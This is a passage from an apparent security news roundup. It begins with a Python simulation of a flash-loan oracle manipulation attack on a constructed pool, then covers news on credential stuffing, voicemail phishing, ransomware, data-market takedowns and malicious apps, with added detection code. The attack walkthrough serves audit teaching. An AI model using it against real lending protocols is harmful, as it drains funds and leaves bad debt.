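        k = self.reserve_a * self.reserve_b
        self.reserve_b += amount_b
        out_a = self.reserve_a - k / self.reserve_b
        self.reserve_a = k / self.reserve_b
        return out_a


def spot_oracle(pool: Pool) -> float:
    """Vulnerable: prices collateral from the pool's current reserves, mid-block."""
    return pool.spot_price()


def twap_oracle(pool: Pool) -> float:
    """Hardened: average of prices recorded at earlier block boundaries."""
    return mean(pool.observations)


def flash_loan_attack(pool: Pool, oracle: Callable[[Pool], float], collateral_b: float = 10_000.0,
                      flash_loan_a: float = 1_000_000.0, ltv: float = 0.5) -> Dict[str, float]:
    """Run the manipulation inside one block and report what the attacker walks away with."""
    fair_value_a = collateral_b * pool.spot_price()   # collateral's value before any manipulation
    got_b = pool.swap_a_for_b(flash_loan_a)           # 1. dump the flash-loaned A into the pool; B's price spikes
    oracle_price = oracle(pool)
    borrowed_a = collateral_b * oracle_price * ltv     # 2. borrow A against the collateral at the oracle's price
    repaid_a = pool.swap_b_for_a(got_b)                # 3. sell the B back, restoring the reserves
    if repaid_a < flash_loan_a:                        # 4. the flash loan must be repaid in the same block
        raise RuntimeError("flash loan cannot be repaid; the whole transaction would revert")
    # The attacker keeps the borrowed A and simply abandons the collateral.
    return {"oracle_price": oracle_price, "borrowed_a": borrowed_a,
            "attacker_profit_a": borrowed_a - fair_value_a}


def make_pool() -> Pool:
    """Constructed pool with 1,000,000 of each token, i.e. a fair price of 1 A per B."""
    pool = Pool(1_000_000.0, 1_000_000.0)
    pool.end_block()
    return pool


if __name__ == "__main__":
    print("spot oracle:", flash_loan_attack(make_pool(), spot_oracle))
    print("TWAP oracle:", flash_loan_attack(make_pool(), twap_oracle))
```

With the spot oracle the flash loan quadruples B's price, the lender values 10,000 B at 40,000 A and lends 20,000 A against collateral worth 10,000 A, leaving the protocol with the bad debt. With the TWAP oracle the same transaction sees a price of 1 and the attacker would lose money by walking away from the collateral. Real protocols add swap fees and liquidation logic, but the audit question this points at is the same: where does the price come from, and can it be moved inside one transaction?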

Before investing, investors should research DeFi platforms, protocols, and smart contracts to identify potential risks and ensure that the DeFi investment platform's code has been audited at least once.

Furthermore, they should be cautious of DeFi investment pools with short windows to join and rapid deployment of smart contracts, and aware of the risks of relying on crowdsourced solutions for bug hunting and patching.

According to the FBI, DeFi platforms should implement real-time analytics, monitoring, and rigorous code testing to catch vulnerabilities and suspicious activity, as well as an incident response plan that includes informing investors of any suspicious activity, including smart contract exploitation.

Proxies and Configurations Used for Credential Stuffing Attacks

About the attack

The FBI warns that threat actors are routing credential stuffing attacks through compromised home IP addresses (residential proxies) to hide where the attacks come from and to raise their success rate.

Credential stuffing is a common account takeover method in which attackers take large lists of username and password pairs from earlier breaches and try them automatically across many websites and apps to see which still work. Because many users reuse passwords, a share of the pairs usually do.

How are stolen credentials used?

Working credentials are then sold on to other criminals. The FBI notes that a "config" may include the target website's address, how to form the HTTP request, how to tell a successful login from a failed one, whether proxies are needed, and so on.

In addition, cracking tutorial videos on social media platforms and hacker forums make it easy to learn how to crack accounts with credential stuffing and similar techniques.

Leveraging proxies and configurations automates the process of attempting logins across various sites and facilitates exploitation of online accounts. 

Who are the victims?

In particular, media companies and restaurant groups are considered lucrative targets for credential stuffing attacks due to the number of customer accounts, the general demand for their services, and the relative lack of importance users place on these types of accounts. 

The Australian Federal Police and the FBI identified two websites hosting more than 300,000 sets of credentials obtained through credential stuffing.

How many users affected?

The sites had more than 175,000 registered users and made around $400,000 in sales. Site operators can spot this kind of activity if they know what to look for, which is why attackers turn to residential proxies.

Cyber criminals may also target a company’s mobile applications as well as the website. Mobile applications, which often have weaker security protocols than traditional web applications, frequently permit a higher rate of login attempts, known as checks per minute (CPMs), facilitating faster account validation.

By compromising home routers or other connected devices, attackers can route their login attempts through benign-looking IP addresses and evade network defenders.

Existing security controls flag or block residential proxies far less often than proxies tied to data centers. Along with combo lists, threat actors buy "configs" (configurations) and other tooling on underground forums to raise their success rates.

FBI Alerts About Credential Stuffing Attacks, Configurations and Proxies Used

What is Credential Stuffing?

Credential stuffing attacks, also known as account cracking, consist of trying to access online accounts with username and password combinations taken from existing data leaks or bought on dark web forums.

Because users reuse the same login across many accounts, credential stuffing attacks usually cause significant financial damage through fraudulent purchases, system remediation and downtime, as well as reputational damage.

How is the attack done?

Using valid credentials lets attackers access accounts and services across many sectors, including healthcare, media companies, restaurant groups, retail chains, and food delivery firms.

Once accounts are breached, the attackers make fraudulent purchases of goods and services and try to reach additional online resources, including other financial accounts. The FBI warns that proxies and configurations let cybercriminals automate the brute-forcing and exploitation of accounts.

FBI involved 

FBI said in particular, media companies and restaurant groups are considered lucrative targets for credential stuffing attacks due to the number of customer accounts, the general demand for their services, and the relative lack of importance users place on these types of accounts. 

The FBI warns that attackers can buy combo lists of login credentials from dedicated platforms and websites, along with configs (configurations) that let them adapt credential stuffing tools to specific targets.

A configuration includes the website's address, the HTTP request format, how to recognise a successful attempt, whether proxies are needed, and so on. The FBI also notes that cybercriminals can find video tutorials teaching how to use credential stuffing to hijack accounts.

SecurityWeek reports: "To bypass defenses, threat actors may employ proxies, including legitimate proxy services, to obfuscate their actual IP addresses. According to the FBI, cybercriminals have extensively used residential proxies to execute credential stuffing attacks, as these are blocked less frequently compared to proxies associated with data centers."
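Both credential stuffing posts above describe the same two signals a defender can use: a single source trying many different accounts with a high failure rate, and the residential-proxy variant, where each attempt comes from a different home IP so per-address limits never trigger, but the attempts still share a tool fingerprint, a target endpoint (often the mobile API with its higher checks per minute) and a tight time window. The following is an added example, not code from the FBI advisory or from any vendor; the log format, the addresses, the account names and the thresholds are constructed for illustration.

```python
"""Detecting credential stuffing in authentication logs.

Added example: not code from the FBI advisory or from any vendor. The log
format, hosts, user names and thresholds are all constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) endpoint=(?P<endpoint>\S+) "
    r"result=(?P<result>\S+) ua=(?P<ua>.+)$"
)


def _line(hhmmss: str, ip: str, user: str, endpoint: str, result: str, ua: str) -> str:
    return f"2022-08-18T{hhmmss}Z ip={ip} user={user} endpoint={endpoint} result={result} ua={ua}"


# Constructed sample log (hypothetical addresses and accounts):
SAMPLE_LOG = "\n".join(
    # a legitimate user who mistypes a password once
    [_line("10:00:01", "203.0.113.7", "alice", "/login", "fail", "Mozilla/5.0"),
     _line("10:00:09", "203.0.113.7", "alice", "/login", "ok", "Mozilla/5.0")]
    # one data-centre IP cycling through a combo list: many users, mostly failures
    + [_line(f"10:00:{10 + i:02d}", "198.51.100.20", f"user{i}", "/login",
             "ok" if i == 3 else "fail", "python-requests/2.28") for i in range(8)]
    # the same combo list spread over residential proxies, one attempt per IP,
    # aimed at the mobile API and sharing one client fingerprint
    + [_line(f"10:01:{5 * i:02d}", f"192.0.2.{i + 1}", f"victim{i}", "/api/v2/login",
             "ok" if i == 7 else "fail", "okhttp/3.12.1") for i in range(10)]
)


def parse_log(text: str) -> List[Dict]:
    """Parse lines in the constructed format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(e)
    return events


def detect_stuffing(events: List[Dict], min_users: int = 5, min_fail_ratio: float = 0.8,
                    min_ips: int = 8, window_s: int = 300) -> Dict:
    """Two detections: a single noisy source, and a distributed run behind many proxies."""
    by_ip, by_client = defaultdict(list), defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
        by_client[(e["ua"], e["endpoint"])].append(e)   # crude client fingerprint

    # 1. Per-IP: one address trying many different accounts and mostly failing.
    single_source = []
    for ip, evs in by_ip.items():
        users = {e["user"] for e in evs}
        fail_ratio = sum(e["result"] != "ok" for e in evs) / len(evs)
        if len(users) >= min_users and fail_ratio >= min_fail_ratio:
            single_source.append(ip)

    # 2. Per-fingerprint: many IPs, one attempt each, same tool, same endpoint,
    #    inside a short window. Per-IP thresholds never fire on this pattern.
    distributed = []
    for (ua, endpoint), evs in by_client.items():
        ips = {e["ip"] for e in evs}
        users = {e["user"] for e in evs}
        fail_ratio = sum(e["result"] != "ok" for e in evs) / len(evs)
        span_s = (max(e["ts"] for e in evs) - min(e["ts"] for e in evs)).total_seconds()
        if (len(ips) >= min_ips and fail_ratio >= min_fail_ratio
                and len(users) >= 0.9 * len(evs) and span_s <= window_s):
            cpm = len(evs) / max(span_s / 60.0, 1.0)   # checks per minute, floored at a one-minute window
            distributed.append({"ua": ua, "endpoint": endpoint, "ips": len(ips), "cpm": round(cpm, 1)})

    return {"single_source": sorted(single_source), "distributed": distributed}


if __name__ == "__main__":
    print(detect_stuffing(parse_log(SAMPLE_LOG)))
```

On the constructed log the per-IP rule catches only the data-centre source; the proxied run from ten home addresses is invisible to it and is caught only by grouping on the shared client fingerprint and endpoint. The thresholds are illustrative and need tuning per site, and a real User-Agent is trivially spoofable, so production detection would combine it with TLS fingerprinting, request timing and the login success ratio per endpoint.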

NetWalker: Ex-Canadian Government Employee Pleads Guilty to Cybercrimes


A former Government of Canada employee has pleaded guilty in a U.S. court to charges stemming from his involvement with the NetWalker ransomware operation.

Sebastien Vachon-Desjardins admitted on Tuesday to conspiring to commit computer fraud and wire fraud, intentionally damaging a protected computer, and transmitting a ransom demand related to that damaged computer.

Plea agreement filed

Vachon-Desjardins, 34, who had already been sentenced to six years and eight months in prison after pleading guilty to five criminal offences in Canada, was extradited to the United States in March.

His plea agreement describes him as "one of the most prolific NetWalker Ransomware affiliates," responsible for extorting millions of dollars from businesses around the world. He will forfeit $21.5 million, along with 21 laptops, smartphones, game consoles, and other devices.

According to a court filing submitted this week, he pleaded guilty to conspiracy to commit computer fraud, conspiracy to commit wire fraud, intentionally damaging a protected computer, and transmitting a demand in relation to damaging a protected computer. The charges carry a combined maximum sentence of 40 years in prison. Prosecutors did not name the targeted business but said it is based in Tampa and was attacked on May 1, 2020.

NetWalker gang's collapse

NetWalker, a ransomware-as-a-service (RaaS) operation, first surfaced in 2019, and its developers are believed to be based in Russia. Its standard playbook is double extortion: steal sensitive data, encrypt the victim's systems, and demand cryptocurrency under threat of publishing the stolen material online.

According to reports, the NetWalker gang deliberately targeted the healthcare sector during the COVID-19 pandemic to exploit the global crisis. Vachon-Desjardins, one of roughly 100 NetWalker affiliates, is suspected of involvement in at least 91 attacks since April 2020 and is also believed to have worked for other RaaS operations, including Sodinokibi (REvil), SunCrypt, and RagnarLocker.

As part of the NetWalker takedown, U.S. authorities seized the gang's servers and the dark web site it used to communicate with ransomware victims, and then charged Vachon-Desjardins, who, according to the FBI, earned $27 million for the NetWalker operation.

His role in cybercrime is said to have included gathering information on victims, managing the servers hosting tools for reconnaissance, privilege escalation, data theft, as well as running accounts that posted the stolen data on the data leak site and collecting payments following a successful attack. 

Many victims did pay: the plea agreement ties Vachon-Desjardins to roughly 1,864 Bitcoin in ransom payments, about $21.5 million, extorted from businesses around the world.

Phishing Emails Faking Voicemails aim to Steal Your Data


A phishing campaign is sending emails that pose as voicemail notifications to steal victims' Microsoft 365 and Outlook credentials. Researchers at Zscaler's ThreatLabz said the campaign, which resembles one they tracked in 2020, was first spotted in May and is still active.

The researchers stated this month that the recent wave targets US organizations across various industries, including software security, security solution providers, the military, healthcare and pharmaceuticals, and the manufacturing and shipping supply chain. 

An email is where it all begins

The emails tell recipients they have a missed voicemail and link to a web-hosted "attachment". Many people rarely check voicemail, but voice messages on LinkedIn and WhatsApp have been around for long enough that a missed-message lure is plausible, which is why it succeeds at getting clicks.

The link leads not to a voicemail but to a credential phishing page hosted on servers in Japan. The URL ends with the target's email address in encoded form; if that encoded address is missing, the visitor is redirected to the Microsoft Office website or to Wikipedia, which keeps automated URL scanners that fetch a stripped-down link from ever seeing the phishing page.

Visitors must first solve a CAPTCHA, another hurdle for automated analysis, after which they land on the final Office 365 phishing page. The 2020 campaign Zscaler tracked used the same approach.
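The encoded email address at the end of the URL serves two purposes for the attacker: it pre-fills the victim's identity on the phishing page and, since the kit redirects to a benign site when it is absent, it defeats scanners that fetch a normalised URL. A defender can turn that around and treat a base64-encoded email address in a link as a signal in its own right. The following is an added example, not code from Zscaler or from the campaign; the URLs are constructed and example.test is a reserved documentation hostname.

```python
"""Spotting a base64-encoded victim e-mail address in a phishing URL.

Added example: not code from Zscaler or from the campaign described above.
The URLs below are constructed; example.test is reserved for documentation.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/_=-]+$")


def _decode_b64(token: str) -> Optional[str]:
    """Decode standard or URL-safe base64, tolerating stripped or %-encoded padding."""
    token = unquote(token).strip()
    if len(token) < 8 or not B64_RE.match(token):   # too short to hold an address, or not base64
        return None
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.urlsafe_b64decode(padded)      # also accepts the standard '+' and '/' alphabet
        return raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def encoded_email_in_url(url: str) -> Optional[str]:
    """Return the decoded address if a path segment, query value or fragment is a base64 e-mail."""
    parts = urlsplit(url)
    candidates = [seg for seg in parts.path.split("/") if seg]
    candidates += [kv.split("=", 1)[-1] for kv in parts.query.split("&") if kv]
    if parts.fragment:
        candidates.append(parts.fragment)
    for token in reversed(candidates):   # the identifier is usually the trailing component
        decoded = _decode_b64(token)
        if decoded and EMAIL_RE.match(decoded):
            return decoded
    return None


if __name__ == "__main__":
    for u in ("https://example.test/vm/play/amFuZS5kb2VAZXhhbXBsZS5jb20=",
              "https://example.test/vm/play/?u=amFuZS5kb2VAZXhhbXBsZS5jb20",
              "https://example.test/vm/play/#amFuZS5kb2VAZXhhbXBsZS5jb20%3D",
              "https://example.test/vm/play/"):
        print(u, "->", encoded_email_in_url(u))
```

When a mail gateway or URL sandbox finds such a token, two things follow: the decoded address identifies which mailbox was targeted, which is useful for scoping, and the link must be detonated with the token intact, because the kit described above shows a harmless page to anyone who fetches it without one.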

"Since they can persuade the victims to open the email attachments, voicemail-themed phishing attacks continue to be an effective social engineering strategy for attackers. This, together with the use of evasion techniques to get around automatic URL inspection tools, aids the threat actor in acquiring the users' credentials more successfully "reports Zscaler ThreatLabz

Microsoft 365 Remains a Popular Target

In a 2022 Egress research titled "Fighting Phishing: The IT Leader's View," it was found that 40% of firms utilizing Microsoft 365 reported becoming victims of credential theft, and 85% of organizations using Microsoft 365 reported being victims of phishing in the previous 12 months. 

Phishing surged during the peak of the COVID-19 pandemic in 2020 and 2021, as most businesses moved quickly to a largely remote workforce with many employees working from home.

The credentials the campaign harvests can serve a number of criminal ends: taking over accounts to reach files and steal data, sending malicious email that appears to come from a legitimate organization, planting malware, and adding the user ID/password pairs to credential-stuffing lists in the hope that victims have reused the same password on other accounts.

A rich mine of data that may be downloaded in bulk can usually be found in Microsoft 365 accounts, according to Robin Bell, CISO of Egress. Hackers may also use compromised Microsoft 365 accounts to send phishing emails to the victim's contacts in an effort to boost the success of their attacks.

Feds Take Down SSNDOB Marketplace for Selling Private Data of 24 Million US Citizens


SSNDOB, an illicit online marketplace that sold the personal details of nearly 24 million US citizens, has been taken down in an international law enforcement operation involving the FBI, the Internal Revenue Service, the Department of Justice, and the Cyprus Police.

The feds seized four domains hosting the SSNDOB marketplace as part of this operation: "ssndob.ws," "ssndob.vip," "ssndob.club," and "blackjob.biz." 

According to the DOJ, the listings included names, dates of birth, Social Security numbers and credit card numbers, and generated more than $19 million in revenue.

"A series of websites that operated for years and were used to sell personal information, including the names, dates of birth, and Social Security numbers belonging to individuals in the United States. The SSNDOB Marketplace has listed the personal information for approximately 24 million individuals in the United States, generating more than $19 million USD in sales revenue," DOJ stated. 

While the marketplace also sold UK citizens' dates of birth, it was primarily used to sell the personal data of US individuals, for as little as $0.50 per record.

According to cybersecurity firm Advanced Intel, most of the data was stolen via healthcare and hospital data breaches. Subsequently, the attackers used the information to launch a financial scam. 

"SSNDOB was one of the largest crime shops offering a collection of personally identifiable information for fraudsters and played an integral part in fraud schemes. The majority of the customers used the shop data for various types of scams from tax to bank fraud," AdvIntel CEO Vitali Kremez explained. 

Chainalysis, a blockchain analysis firm, published its own report on the SSNDOB incident revealing that the marketplace received approximately $22 million worth of Bitcoin across over 100,000 transactions since April 2015, though the marketplace is believed to have been operating since at least 2013. 

However, one of the most interesting details researchers identified was a link between SSNDOB and Joker's Stash, which shut down its operations voluntarily in January 2021 due to increased pressure from law enforcement agencies, disruptions due to COVID-19, and the decreasing quality of stolen credit cards. 

"Perhaps most interesting of all though is the activity we see between SSNDOB and Joker’s Stash, a large darknet market focused on stolen credit card information and other PII that shut down in January 2021," explains Chainalysis' report. Between December 2018 and June 2019, SSNDOB sent over $100,000 worth of Bitcoin to Joker’s Stash, suggesting the two markets may have had some relationship to one another, including possibly shared ownership."

U.S. Agencies Seize Domains Employed for Selling Credentials


Earlier this week, the U.S. Department of Justice and the FBI announced the seizure of three domains used to sell compromised personal information and to launch attacks on victim networks.

The specific domains seized were weleakinfo.to, ipstress.in, and ovh-booter.com — the first of which allowed its users to traffic compromised personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches. The other two domains offered DDoS-for-hire services to their users. 

The domains were taken down as part of an international investigation, in which the National Police Corps of the Netherlands and the Federal Police of Belgium arrested the primary suspect, searched several locations, and seized the underlying infrastructure. 

The weleakinfo.to domain offered access to seven billion records containing private data such as names, phone numbers, usernames, email addresses, and passwords. 

The seizure of this domain comes roughly two years after the FBI and the US Department of Justice took control of the internet domain name weleakinfo.com, which offered identical services. 

"Today, the FBI and the Department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses," stated Matthew M. Graves, U.S. Attorney for the District of Columbia. “With the execution of the warrant, the seized domain names – weleakinfo.to and the related domains – are now in the federal government's custody, effectively suspending the website’s operation.” 

 "Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security, and commerce around the globe." 

According to the DOJ, it remains unclear how long the weleakinfo.to domain was in operation. Still, the website developed a reputation for selling names, email addresses, usernames, phone numbers, and passwords for online accounts to cybercriminals, who could buy a subscription for one day, one week, one month, three months, or a lifetime.

Two years ago in January 2020, the FBI and the US DOJ announced the seizure of the WeLeakInfo.com domain, used in similar cybercrime activity. Just as WeLeakInfo.to, it also offered subscriptions, allowing customers to search 12 billion indexed records for specific information exposed in thousands of data breaches.

FBI Warns of Hackers Selling US College VPN Credentials on Underground Forums


Threat actors are advertising network credentials and virtual private network (VPN) access for colleges and universities based in the United States on underground and public criminal marketplaces. 

Last week, the Federal Bureau of Investigation (FBI) issued an advisory about usernames and passwords for U.S. colleges and universities being put up for sale on Russian cybercriminal platforms. Prices for the stolen credentials range from a few U.S. dollars to thousands.

Attackers harvest the credentials through spear-phishing, ransomware intrusions and similar attacks and sell them on Russian-language hacking forums. Because people reuse passwords, buyers can use them in credential stuffing and brute-force attempts against the victims' other accounts, websites, and services.

"If attackers are successful in compromising a victim account, they may attempt to drain the account of stored value, leverage or re-sell credit card numbers and other personally identifiable information, submit fraudulent transactions, exploit for other criminal activity against the account holder, or use for subsequent attacks against affiliated organizations," the FBI warned. 

Last year in May, the agency said it identified more than 36,000 email and password combinations for email accounts ending in the ".edu" domain publicly available on an instant messaging platform posted by a group that specialized in the trafficking of stolen login credentials. 

According to Emsisoft threat analyst Brett Callow, 10 of the 13 attacks on colleges this year involved data exfiltration. Ohlone College, Savannah State University, University of Detroit Mercy, Centralia College, Phillips Community College of the University of Arkansas, Florida International University, and Stratford University are just a few of the schools impacted by ransomware this year. 

Security tips 

The FBI advises academic institutions to contact their local FBI Field Office and to update their incident response and communication plans. Brute-force protection, phishing awareness training for students and faculty, strong and unique passwords, and multi-factor authentication are the usual recommendations and apply to all organizations.

"Universities, especially, should be providing students and staff with training to spot convincing phishing emails and the steps to undertake when opening various attachments or emails. Students are an easy target because unlike in a work environment, they often lack the necessary understanding to spot these types of attacks," stated Steven Hope, CEO, and co-founder of password management firm Authlogics.

NCSC Warns Of Threats Posed By Malicious Apps


A new report by the UK's National Cyber Security Centre (NCSC) has alerted of the threats posed by malicious applications. While most people are familiar with apps downloaded to smartphones, they are also available on everything from smart TVs to smart speakers. 

The government is seeking input on new security and privacy guidelines for apps and app stores. Ian Levy, the NCSC's technical director, said app stores could do more to improve security, and that cybercriminals are currently exploiting weaknesses in app stores across all kinds of connected devices to cause harm.

Android phone users downloaded apps containing the Triada and Escobar malware from various third-party app stores last year, according to the FBI.  "This resulted in cyber-criminals remotely taking control of people's phones and stealing their data and money by signing them up for premium subscription services," it said.

The NCSC's report noted that apps "can also be installed on laptops, computers, games consoles, wearable devices (such as smartwatches or fitness trackers), smart TVs, smart speakers (such as Alexa devices), and IoT (internet of things) devices". It includes an example of a security firm illustrating how it could construct a malicious app for a prominent fitness tracker that could be downloaded via a link that seemed legitimate because it used the company's web address. 

Spyware/stalkerware capable of stealing anything from location to personal body data was found in the app. After the security firm alerted the company, it proceeded to rectify the situation. 

Demand for apps grew during the pandemic, according to the NCSC report, and the UK app market is now valued at £18.6 billion ($23.2 billion). The NCSC supports the government's proposal to ask app store operators to sign up to a new code of practice setting out baseline security and privacy requirements.

"Developers and store operators making apps available to UK users would be covered. This includes Apple, Google, Amazon, Huawei, Microsoft and Samsung," the government stated.

The new code of practice would require store operators to set up processes for finding and fixing security problems more quickly.